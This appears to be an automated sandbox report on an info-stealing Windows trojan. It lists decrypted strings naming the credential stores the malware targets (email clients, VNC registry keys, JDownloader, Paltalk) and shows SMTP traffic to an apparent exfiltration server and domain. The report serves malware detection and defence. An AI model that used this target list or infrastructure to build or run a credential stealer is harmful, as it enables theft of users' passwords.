                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Pocomail\accounts.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: POPPass
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SMTPPass
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SMTP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: eM Client
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: eM Client\accounts.dat
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: eM Client
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Accounts
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: "Username":"
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: "Secret":"
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: "ProviderName":"
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: o6806642kbM7c5
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Mailbird
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SenderIdentities
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Accounts
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Mailbird\Store\Store.db
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Server_Host
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Accounts
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Username
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: EncryptedPassword
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Mailbird
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\ORL\WinVNC3
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: TightVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: TightVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PasswordViewOnly
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: TightVNC ControlPassword
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ControlPassword
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: TigerVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\TigerVNC\Server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UltraVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passwd
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UltraVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passwd2
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UltraVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passwd
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UltraVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passwd2
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UltraVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passwd
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UltraVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passwd2
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UltraVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passwd
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UltraVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passwd2
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: JDownloader 2.0
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: JDownloader 2.0\cfg
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: JDownloader 2.0\cfg
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Paltalk
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: nickname
                        Source: LisectAVT_2403002A_16.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: LisectAVT_2403002A_16.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: FPzK.pdb source: LisectAVT_2403002A_16.exe, NxmtwwVGOtEdjd.exe.0.dr
                        Source: Binary string: FPzK.pdbSHA256 source: LisectAVT_2403002A_16.exe, NxmtwwVGOtEdjd.exe.0.dr
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 4x nop then jmp 05A8CF23h0_2_05A8CF7B
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 4x nop then jmp 0795C1ACh10_2_0795C204
                        Source: global trafficTCP traffic: 192.168.2.4:49735 -> 199.79.62.115:587
                        Source: Joe Sandbox ViewIP Address: 199.79.62.115 199.79.62.115
                        Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                        Source: global trafficTCP traffic: 192.168.2.4:49735 -> 199.79.62.115:587
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: mail.mbarieservicesltd.com
                        Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                        Source: LisectAVT_2403002A_16.exe, 00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, NxmtwwVGOtEdjd.exe, 0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.mbarieservicesltd.com
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1722615685.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp, NxmtwwVGOtEdjd.exe, 0000000A.00000002.1786665418.000000000323E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726399605.0000000005990000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_0130DC740_2_0130DC74
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A806200_2_05A80620
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A806110_2_05A80611
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A800060_2_05A80006
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A800400_2_05A80040
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A872B80_2_05A872B8
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A88F480_2_05A88F48
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A88F580_2_05A88F58
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A86E800_2_05A86E80
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A88B200_2_05A88B20
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A86A150_2_05A86A15
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A86A480_2_05A86A48
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_013841409_2_01384140
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_01384D589_2_01384D58
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_013844889_2_01384488
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_066039349_2_06603934
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_066019A09_2_066019A0
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_0668C2189_2_0668C218
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_066863389_2_06686338
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_066800409_2_06680040
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_0668A8F09_2_0668A8F0
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_066894B09_2_066894B0
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_06689C389_2_06689C38
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_066839E89_2_066839E8
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_066800069_2_06680006
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_066839D89_2_066839D8
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_030CDC7410_2_030CDC74
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_0573703010_2_05737030
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_0573004010_2_05730040
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_0573003210_2_05730032
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_0573702B10_2_0573702B
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_0795004010_2_07950040
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07953E1810_2_07953E18
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_0795E68810_2_0795E688
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_0795061110_2_07950611
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_0795062010_2_07950620
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_0795E66810_2_0795E668
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_079572B810_2_079572B8
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_0795001E10_2_0795001E
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07958F5810_2_07958F58
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07958F4810_2_07958F48
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07956E8010_2_07956E80
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07953E0A10_2_07953E0A
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07958B2010_2_07958B20
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07956A0D10_2_07956A0D
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07956A4810_2_07956A48
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_00FA414015_2_00FA4140
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_00FA4D5815_2_00FA4D58
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_00FA448815_2_00FA4488
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_0630AC8015_2_0630AC80
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_063004C815_2_063004C8
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_0630F57815_2_0630F578
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_0630E5B815_2_0630E5B8
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_0630935815_2_06309358
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_0630716115_2_06307161
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1729697957.000000000757A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1718798256.00000000010FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000000.1647863281.0000000000BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFPzK.exe< vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1730117949.0000000007B90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1722615685.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exe, 00000009.00000002.2898676233.0000000000EF9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exeBinary or memory string: OriginalFilenameFPzK.exe< vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: LisectAVT_2403002A_16.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: NxmtwwVGOtEdjd.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, Icw0P7E5I25dt8WiCY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ioHoB3xyTTvGj5kpgh.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ioHoB3xyTTvGj5kpgh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ioHoB3xyTTvGj5kpgh.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, Icw0P7E5I25dt8WiCY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ioHoB3xyTTvGj5kpgh.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ioHoB3xyTTvGj5kpgh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ioHoB3xyTTvGj5kpgh.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/15@2/1
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeFile created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMutant created: \Sessions\1\BaseNamedObjects\nrmexAQCdAxIpmz
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB5CB.tmpJump to behavior
                        Source: LisectAVT_2403002A_16.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: LisectAVT_2403002A_16.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeFile read: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
